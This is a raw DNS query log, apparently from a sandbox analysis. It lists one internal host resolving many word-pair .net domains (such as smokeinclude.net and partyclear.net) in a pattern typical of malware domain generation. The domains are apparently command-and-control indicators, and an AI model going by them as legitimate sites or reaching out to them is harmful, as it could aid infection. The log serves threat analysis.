                                                                                                                                                                                                          Aug 5, 2024 16:22:59.516791105 CEST192.168.2.71.1.1.10x6697Standard query (0)smokeinclude.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:22:59.529134989 CEST192.168.2.71.1.1.10x6e1bStandard query (0)womannorth.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:22:59.769958973 CEST192.168.2.71.1.1.10xd2baStandard query (0)smokenorth.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:22:59.781807899 CEST192.168.2.71.1.1.10x4731Standard query (0)partyclear.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:22:59.798938036 CEST192.168.2.71.1.1.10x3847Standard query (0)fightclear.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:22:59.819806099 CEST192.168.2.71.1.1.10x3ec1Standard query (0)partygeneral.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.468913078 CEST192.168.2.71.1.1.10x820bStandard query (0)fightgeneral.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.482680082 CEST192.168.2.71.1.1.10x99feStandard query (0)partyinclude.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.495657921 CEST192.168.2.71.1.1.10xd8b1Standard query (0)fightinclude.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.508002043 CEST192.168.2.71.1.1.10x5209Standard query (0)partynorth.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.518887043 CEST192.168.2.71.1.1.10x2d7aStandard query (0)fightnorth.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.769462109 CEST192.168.2.71.1.1.10x5f2aStandard query (0)freshbranch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.781996965 CEST192.168.2.71.1.1.10xc9c9Standard query (0)experiencebranch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.793869019 CEST192.168.2.71.1.1.10x16d1Standard query (0)freshbelieve.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.805071115 CEST192.168.2.71.1.1.10x5f15Standard query (0)experiencebelieve.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.818147898 CEST192.168.2.71.1.1.10x1ee3Standard query (0)freshreceive.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.844660997 CEST192.168.2.71.1.1.10x37b4Standard query (0)experiencereceive.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.873730898 CEST192.168.2.71.1.1.10xa4abStandard query (0)freshquarter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.885044098 CEST192.168.2.71.1.1.10x6fcdStandard query (0)experiencequarter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:01.126734018 CEST192.168.2.71.1.1.10xccacStandard query (0)gentlemanbranch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:01.140727043 CEST192.168.2.71.1.1.10xe403Standard query (0)alreadybranch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:01.152507067 CEST192.168.2.71.1.1.10xdaefStandard query (0)gentlemanbelieve.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:01.167009115 CEST192.168.2.71.1.1.10x677bStandard query (0)alreadybelieve.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:01.180201054 CEST192.168.2.71.1.1.10x39faStandard query (0)gentlemanreceive.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:01.192198038 CEST192.168.2.71.1.1.10x2c0bStandard query (0)alreadyreceive.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:01.206293106 CEST192.168.2.71.1.1.10x4b02Standard query (0)gentlemanquarter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:01.447448015 CEST192.168.2.71.1.1.10x2644Standard query (0)alreadyquarter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:01.460310936 CEST192.168.2.71.1.1.10x4cbaStandard query (0)followbranch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:01.475070000 CEST192.168.2.71.1.1.10xeb68Standard query (0)memberbranch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:01.488322973 CEST192.168.2.71.1.1.10x2bb8Standard query (0)followbelieve.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:01.734870911 CEST192.168.2.71.1.1.10x8529Standard query (0)memberbelieve.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:01.988740921 CEST192.168.2.71.1.1.10x6965Standard query (0)followreceive.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:02.156263113 CEST192.168.2.71.1.1.10xa408Standard query (0)memberreceive.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:03.282030106 CEST192.168.2.71.1.1.10x6b64Standard query (0)followquarter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:03.295202971 CEST192.168.2.71.1.1.10xe563Standard query (0)memberquarter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:03.315262079 CEST192.168.2.71.1.1.10x1065Standard query (0)beginbranch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:03.337171078 CEST192.168.2.71.1.1.10x4e44Standard query (0)knownbranch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:03.604362011 CEST192.168.2.71.1.1.10x94cStandard query (0)beginbelieve.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:04.608788967 CEST192.168.2.71.1.1.10x94cStandard query (0)beginbelieve.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:04.835983992 CEST192.168.2.71.1.1.10xa61bStandard query (0)knownbelieve.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:04.847100973 CEST192.168.2.71.1.1.10x60b4Standard query (0)beginreceive.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:05.090862989 CEST192.168.2.71.1.1.10xc3b8Standard query (0)knownreceive.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:05.341633081 CEST192.168.2.71.1.1.10x9190Standard query (0)beginquarter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:05.585297108 CEST192.168.2.71.1.1.10xa3ceStandard query (0)knownquarter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:05.597881079 CEST192.168.2.71.1.1.10x2466Standard query (0)summerbranch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:05.840672970 CEST192.168.2.71.1.1.10x95d6Standard query (0)crowdbranch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:05.853703976 CEST192.168.2.71.1.1.10xaa58Standard query (0)summerbelieve.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:05.866008997 CEST192.168.2.71.1.1.10x812Standard query (0)crowdbelieve.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:06.116499901 CEST192.168.2.71.1.1.10xe050Standard query (0)summerreceive.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:06.128492117 CEST192.168.2.71.1.1.10xec85Standard query (0)crowdreceive.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:06.490979910 CEST192.168.2.71.1.1.10xaf40Standard query (0)summerquarter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:06.735596895 CEST192.168.2.71.1.1.10xd1e9Standard query (0)crowdquarter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:06.747950077 CEST192.168.2.71.1.1.10xefe4Standard query (0)thoughtbranch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:07.849172115 CEST192.168.2.71.1.1.10xa031Standard query (0)waterbranch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:07.865964890 CEST192.168.2.71.1.1.10x3d40Standard query (0)thoughtbelieve.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:07.887386084 CEST192.168.2.71.1.1.10xf352Standard query (0)waterbelieve.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.141685009 CEST192.168.2.71.1.1.10x1e49Standard query (0)thoughtreceive.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.154092073 CEST192.168.2.71.1.1.10x29ecStandard query (0)waterreceive.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.168565035 CEST192.168.2.71.1.1.10xbcd1Standard query (0)thoughtquarter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.409615040 CEST192.168.2.71.1.1.10xd06cStandard query (0)waterquarter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.423027039 CEST192.168.2.71.1.1.10xe8ddStandard query (0)womanbranch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.434900999 CEST192.168.2.71.1.1.10x31e5Standard query (0)smokebranch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.677520990 CEST192.168.2.71.1.1.10xfc2fStandard query (0)womanbelieve.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.184705973 CEST192.168.2.71.1.1.10x3e92Standard query (0)smokebelieve.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.346751928 CEST192.168.2.71.1.1.10x8bb3Standard query (0)womanreceive.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.358485937 CEST192.168.2.71.1.1.10x852aStandard query (0)smokereceive.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.369172096 CEST192.168.2.71.1.1.10x43f9Standard query (0)womanquarter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.382386923 CEST192.168.2.71.1.1.10x6394Standard query (0)smokequarter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.394016981 CEST192.168.2.71.1.1.10x684dStandard query (0)partybranch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.404695988 CEST192.168.2.71.1.1.10x5ee0Standard query (0)fightbranch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.415920019 CEST192.168.2.71.1.1.10xd087Standard query (0)partybelieve.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:10.120335102 CEST192.168.2.71.1.1.10xc6a6Standard query (0)fightbelieve.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:10.132428885 CEST192.168.2.71.1.1.10xf832Standard query (0)partyreceive.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:10.144993067 CEST192.168.2.71.1.1.10x480eStandard query (0)fightreceive.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.140019894 CEST192.168.2.71.1.1.10x480eStandard query (0)fightreceive.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.338663101 CEST192.168.2.71.1.1.10x42b2Standard query (0)partyquarter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.585304022 CEST192.168.2.71.1.1.10x2855Standard query (0)fightquarter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.596183062 CEST192.168.2.71.1.1.10x970Standard query (0)freshhonor.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.608077049 CEST192.168.2.71.1.1.10xdcd4Standard query (0)experiencehonor.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.620794058 CEST192.168.2.71.1.1.10xa235Standard query (0)freshneither.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.870515108 CEST192.168.2.71.1.1.10x6e26Standard query (0)experienceneither.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.882783890 CEST192.168.2.71.1.1.10x862bStandard query (0)freshsystem.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.124109030 CEST192.168.2.71.1.1.10x7de3Standard query (0)experiencesystem.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.137336016 CEST192.168.2.71.1.1.10x13c0Standard query (0)freshtrust.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.149853945 CEST192.168.2.71.1.1.10xf617Standard query (0)experiencetrust.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.388535023 CEST192.168.2.71.1.1.10x4524Standard query (0)gentlemanhonor.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.404055119 CEST192.168.2.71.1.1.10xd3bbStandard query (0)alreadyhonor.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.419003010 CEST192.168.2.71.1.1.10x1557Standard query (0)gentlemanneither.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.670917988 CEST192.168.2.71.1.1.10x92f4Standard query (0)alreadyneither.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.690764904 CEST192.168.2.71.1.1.10xcebfStandard query (0)gentlemansystem.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.704890013 CEST192.168.2.71.1.1.10xc33eStandard query (0)alreadysystem.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.716545105 CEST192.168.2.71.1.1.10x4832Standard query (0)gentlemantrust.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.956458092 CEST192.168.2.71.1.1.10x1bb4Standard query (0)alreadytrust.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.973203897 CEST192.168.2.71.1.1.10x86a9Standard query (0)followhonor.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.986319065 CEST192.168.2.71.1.1.10x41c2Standard query (0)memberhonor.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.999150991 CEST192.168.2.71.1.1.10x11c7Standard query (0)followneither.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.019520044 CEST192.168.2.71.1.1.10x64acStandard query (0)memberneither.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.265332937 CEST192.168.2.71.1.1.10xaa11Standard query (0)followsystem.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.278017044 CEST192.168.2.71.1.1.10x8b99Standard query (0)membersystem.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.982986927 CEST192.168.2.71.1.1.10x8c56Standard query (0)followtrust.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:14.234230995 CEST192.168.2.71.1.1.10x145cStandard query (0)membertrust.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:14.778151989 CEST192.168.2.71.1.1.10x38b6Standard query (0)beginhonor.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.024501085 CEST192.168.2.71.1.1.10x72f7Standard query (0)knownhonor.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.036873102 CEST192.168.2.71.1.1.10xc9adStandard query (0)beginneither.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.287492990 CEST192.168.2.71.1.1.10xca5eStandard query (0)knownneither.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.530410051 CEST192.168.2.71.1.1.10x37cfStandard query (0)beginsystem.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.543965101 CEST192.168.2.71.1.1.10xc5b0Standard query (0)knownsystem.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.788389921 CEST192.168.2.71.1.1.10x382Standard query (0)begintrust.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.802088022 CEST192.168.2.71.1.1.10x5ad0Standard query (0)knowntrust.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.818175077 CEST192.168.2.71.1.1.10xc6fStandard query (0)summerhonor.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.833758116 CEST192.168.2.71.1.1.10x4b9bStandard query (0)crowdhonor.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:16.076986074 CEST192.168.2.71.1.1.10x676fStandard query (0)summerneither.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:16.089977026 CEST192.168.2.71.1.1.10xc2a4Standard query (0)crowdneither.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:16.106254101 CEST192.168.2.71.1.1.10x3455Standard query (0)summersystem.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:16.118916988 CEST192.168.2.71.1.1.10x9f3dStandard query (0)crowdsystem.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:16.135863066 CEST192.168.2.71.1.1.10x6058Standard query (0)summertrust.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:16.148502111 CEST192.168.2.71.1.1.10xbb52Standard query (0)crowdtrust.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:17.111905098 CEST192.168.2.71.1.1.10xfa40Standard query (0)thoughthonor.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:17.132673979 CEST192.168.2.71.1.1.10x8b28Standard query (0)waterhonor.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:17.155555010 CEST192.168.2.71.1.1.10x5995Standard query (0)thoughtneither.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:17.176980972 CEST192.168.2.71.1.1.10x205fStandard query (0)waterneither.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:17.493551970 CEST192.168.2.71.1.1.10xcd7Standard query (0)thoughtsystem.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:18.629637957 CEST192.168.2.71.1.1.10x9effStandard query (0)watersystem.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:19.360114098 CEST192.168.2.71.1.1.10x2cb9Standard query (0)thoughttrust.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:19.604113102 CEST192.168.2.71.1.1.10xb6c1Standard query (0)watertrust.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:20.042613983 CEST192.168.2.71.1.1.10xdcbfStandard query (0)womanhonor.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:21.354139090 CEST192.168.2.71.1.1.10x5909Standard query (0)smokehonor.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:21.599212885 CEST192.168.2.71.1.1.10x4ad2Standard query (0)womanneither.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:21.615145922 CEST192.168.2.71.1.1.10x391Standard query (0)smokeneither.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:21.626872063 CEST192.168.2.71.1.1.10x4709Standard query (0)womansystem.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:21.801013947 CEST192.168.2.71.1.1.10xe1bbStandard query (0)smokesystem.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.051450968 CEST192.168.2.71.1.1.10xd725Standard query (0)womantrust.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.063122034 CEST192.168.2.71.1.1.10x581bStandard query (0)smoketrust.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.308860064 CEST192.168.2.71.1.1.10xc380Standard query (0)partyhonor.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.321954966 CEST192.168.2.71.1.1.10xaee2Standard query (0)fighthonor.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.334274054 CEST192.168.2.71.1.1.10x94a9Standard query (0)partyneither.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.349205017 CEST192.168.2.71.1.1.10xfd7bStandard query (0)fightneither.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.364785910 CEST192.168.2.71.1.1.10xf73bStandard query (0)partysystem.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.528754950 CEST192.168.2.71.1.1.10xc7a9Standard query (0)fightsystem.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.564809084 CEST192.168.2.71.1.1.10x4c8bStandard query (0)partytrust.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.576502085 CEST192.168.2.71.1.1.10x68dcStandard query (0)fighttrust.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.587383986 CEST192.168.2.71.1.1.10x5cb1Standard query (0)freshlaughter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.602730989 CEST192.168.2.71.1.1.10x2b38Standard query (0)experiencelaughter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.853321075 CEST192.168.2.71.1.1.10x6bceStandard query (0)freshfancy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:23.543642044 CEST192.168.2.71.1.1.10xca35Standard query (0)experiencefancy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:23.786580086 CEST192.168.2.71.1.1.10x3affStandard query (0)freshconsider.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:24.032265902 CEST192.168.2.71.1.1.10xcd72Standard query (0)experienceconsider.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:24.278073072 CEST192.168.2.71.1.1.10xf72fStandard query (0)freshfriend.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:24.289673090 CEST192.168.2.71.1.1.10xa8f4Standard query (0)experiencefriend.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:24.539998055 CEST192.168.2.71.1.1.10x2a4cStandard query (0)gentlemanlaughter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:24.550476074 CEST192.168.2.71.1.1.10xdebeStandard query (0)alreadylaughter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:24.729669094 CEST192.168.2.71.1.1.10xa304Standard query (0)gentlemanfancy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:24.982945919 CEST192.168.2.71.1.1.10xad30Standard query (0)alreadyfancy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:24.995552063 CEST192.168.2.71.1.1.10x4323Standard query (0)gentlemanconsider.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:25.009118080 CEST192.168.2.71.1.1.10xb373Standard query (0)alreadyconsider.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:25.019994974 CEST192.168.2.71.1.1.10x1406Standard query (0)gentlemanfriend.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:25.274055004 CEST192.168.2.71.1.1.10xce48Standard query (0)alreadyfriend.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.153218985 CEST192.168.2.71.1.1.10xcccfStandard query (0)followlaughter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.174304962 CEST192.168.2.71.1.1.10x5336Standard query (0)memberlaughter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.184897900 CEST192.168.2.71.1.1.10x7589Standard query (0)followfancy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.428072929 CEST192.168.2.71.1.1.10xe3c1Standard query (0)memberfancy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.448745012 CEST192.168.2.71.1.1.10x88cbStandard query (0)followconsider.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.460000992 CEST192.168.2.71.1.1.10x75b7Standard query (0)memberconsider.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.473237991 CEST192.168.2.71.1.1.10xbdadStandard query (0)followfriend.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:27.647510052 CEST192.168.2.71.1.1.10x1fb5Standard query (0)memberfriend.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:27.892193079 CEST192.168.2.71.1.1.10x33bdStandard query (0)beginlaughter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:27.904778004 CEST192.168.2.71.1.1.10xf139Standard query (0)knownlaughter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:19.329459906 CEST192.168.2.71.1.1.10x5c47Standard query (0)fightgeneral.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:20.344276905 CEST192.168.2.71.1.1.10x83c2Standard query (0)partyinclude.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:21.609978914 CEST192.168.2.71.1.1.10xafd8Standard query (0)fightinclude.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:22.641103029 CEST192.168.2.71.1.1.10x7ea5Standard query (0)partynorth.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:23.672787905 CEST192.168.2.71.1.1.10xf4d0Standard query (0)fightnorth.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:24.703435898 CEST192.168.2.71.1.1.10xaf5cStandard query (0)freshbranch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:25.719153881 CEST192.168.2.71.1.1.10xd700Standard query (0)experiencebranch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:26.734932899 CEST192.168.2.71.1.1.10xe137Standard query (0)freshbelieve.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:27.750502110 CEST192.168.2.71.1.1.10x66f0Standard query (0)experiencebelieve.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:28.766252041 CEST192.168.2.71.1.1.10xdb1aStandard query (0)freshreceive.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:30.016100883 CEST192.168.2.71.1.1.10xc187Standard query (0)experiencereceive.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:31.033252954 CEST192.168.2.71.1.1.10x5c0cStandard query (0)freshquarter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:32.281800985 CEST192.168.2.71.1.1.10x2692Standard query (0)experiencequarter.netA (IP address)IN (0x0001)false
